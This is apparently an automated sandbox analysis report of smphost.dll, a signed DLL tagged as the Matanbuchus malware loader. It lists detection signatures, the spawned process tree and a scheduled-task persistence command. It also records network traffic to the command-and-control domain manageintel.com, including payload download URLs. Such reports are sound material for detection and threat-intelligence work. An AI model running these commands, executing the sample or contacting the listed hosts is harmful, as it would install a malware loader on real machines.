
Windows Analysis Report
smphost.dll

Overview

General Information

Sample Name: smphost.dll
Analysis ID: 562835
MD5: fc484855692f2a7d1eae090086a1eb72
SHA1: 2e9103747750b40835f58d9e57c2ab75eeaf25f6
SHA256: e58b9bbb7bcdf3e901453b7b9c9e514fed1e53565e3280353dccc77cde26a98e
Tags: dll, matanbuchus, SATURNCONSULTANCYLTD, signed

Detection

Score: 88
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Uses known network protocols on non-standard ports
Sigma detected: Regsvr32 Network Activity
Sigma detected: Suspicious Call by Ordinal
Uses schtasks.exe or at.exe to add and modify task schedules
Uses 32bit PE files
Drops PE files to the application program directory (C:\ProgramData)
One or more processes crash
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to check if a connection to the internet is available
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Registers a DLL
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • loaddll32.exe (PID: 6120 cmdline: loaddll32.exe "C:\Users\user\Desktop\smphost.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)
    • cmd.exe (PID: 4764 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\smphost.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 6212 cmdline: rundll32.exe "C:\Users\user\Desktop\smphost.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • regsvr32.exe (PID: 3576 cmdline: regsvr32.exe /i /s C:\Users\user\Desktop\smphost.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
      • schtasks.exe (PID: 4532 cmdline: C:\Windows\system32\schtasks.exe" /Create /SC MINUTE /MO 3 /TN 5507 /TR "%windir%\system32\regsvr32.exe -e C:\ProgramData\6\5507.ocx MD5: 15FF7D8324231381BAD48A052F85DF04)
      • WerFault.exe (PID: 6348 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3576 -s 2064 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • rundll32.exe (PID: 6256 cmdline: rundll32.exe C:\Users\user\Desktop\smphost.dll,DllInstall MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6760 cmdline: rundll32.exe C:\Users\user\Desktop\smphost.dll,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 5388 cmdline: rundll32.exe C:\Users\user\Desktop\smphost.dll,DllUnregisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • regsvr32.exe (PID: 5808 cmdline: C:\Windows\system32\regsvr32.exe -e C:\ProgramData\6\5507.ocx MD5: D78B75FC68247E8A63ACBA846182740E)
    • regsvr32.exe (PID: 6460 cmdline: -e C:\ProgramData\6\5507.ocx MD5: 426E7499F6A7346F0410DEAD0805586B)
  • regsvr32.exe (PID: 1264 cmdline: C:\Windows\system32\regsvr32.exe -e C:\ProgramData\6\5507.ocx MD5: D78B75FC68247E8A63ACBA846182740E)
    • regsvr32.exe (PID: 2016 cmdline: -e C:\ProgramData\6\5507.ocx MD5: 426E7499F6A7346F0410DEAD0805586B)
  • cleanup
No configs have been found
No yara matches

System Summary

Source: DNS query | Author: Dmitriy Lifanov, oscd.community | Data: Image: C:\Windows\SysWOW64\regsvr32.exe, QueryName: manageintel.com
Source: Process started | Author: Florian Roth | Data: Command: rundll32.exe "C:\Users\user\Desktop\smphost.dll",#1, CommandLine: rundll32.exe "C:\Users\user\Desktop\smphost.dll",#1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\smphost.dll",#1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 4764, ProcessCommandLine: rundll32.exe "C:\Users\user\Desktop\smphost.dll",#1, ProcessId: 6212

Persistence and Installation Behavior

Source: Process started | Author: Joe Security | Data: Command: C:\Windows\system32\schtasks.exe" /Create /SC MINUTE /MO 3 /TN 5507 /TR "%windir%\system32\regsvr32.exe -e C:\ProgramData\6\5507.ocx, CommandLine: C:\Windows\system32\schtasks.exe" /Create /SC MINUTE /MO 3 /TN 5507 /TR "%windir%\system32\regsvr32.exe -e C:\ProgramData\6\5507.ocx, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: regsvr32.exe /i /s C:\Users\user\Desktop\smphost.dll, ParentImage: C:\Windows\SysWOW64\regsvr32.exe, ParentProcessId: 3576, ProcessCommandLine: C:\Windows\system32\schtasks.exe" /Create /SC MINUTE /MO 3 /TN 5507 /TR "%windir%\system32\regsvr32.exe -e C:\ProgramData\6\5507.ocx, ProcessId: 4532


AV Detection

Source: smphost.dll | Virustotal: Detection: 8%
Source: http://manageintel.com/WUzZRUBQje/Auth.php | Avira URL Cloud: Label: malware
Source: smphost.dll | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LARGE_ADDRESS_AWARE
Source: unknown | HTTPS traffic detected: 185.14.31.158:443 -> 192.168.2.3:49759 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.14.31.158:443 -> 192.168.2.3:49841 version: TLS 1.2
Source: smphost.dll | Static PE information: certificate valid
Source: Binary string: B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\Release\BhJM.pdb | source: regsvr32.exe, 00000002.00000002.437623410.000000007FC00000.00000040.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000002.00000002.437475087.0000000004CB0000.00000004.00000800.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 2_2_6E9EED8A FindFirstFileExW, 2_2_6E9EED8A
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 38_2_6F84ED8A FindFirstFileExW, 38_2_6F84ED8A

Networking

Source: C:\Windows\SysWOW64\regsvr32.exe | Network Connect: 185.14.31.158 32710
Source: C:\Windows\SysWOW64\regsvr32.exe | Domain query: manageintel.com
Source: Joe Sandbox View | ASN Name: ITLDC-NLUA ITLDC-NLUA
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 2_2_6E9E8210 InternetCheckConnectionA, InternetOpenUrlA, InternetReadFile, WriteFile, InternetCloseHandle, 2_2_6E9E8210
Source: global traffic | HTTP traffic detected: GET /RKyiihqXQiyE/xukYadevoVow/QXms.xml HTTP/1.1 | Host: manageintel.com | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /RKyiihqXQiyE/xukYadevoVow/BhJM.xml HTTP/1.1 | Host: manageintel.com | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /WUzZRUBQje/vAtVEC.xml HTTP/1.1 | Host: manageintel.com | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /RKyiihqXQiyE/xukYadevoVow/BhJM.xml HTTP/1.1 | Host: manageintel.com | Cache-Control: no-cache
Source: global traffic | TCP traffic: 192.168.2.3:49762 -> 185.14.31.158:32710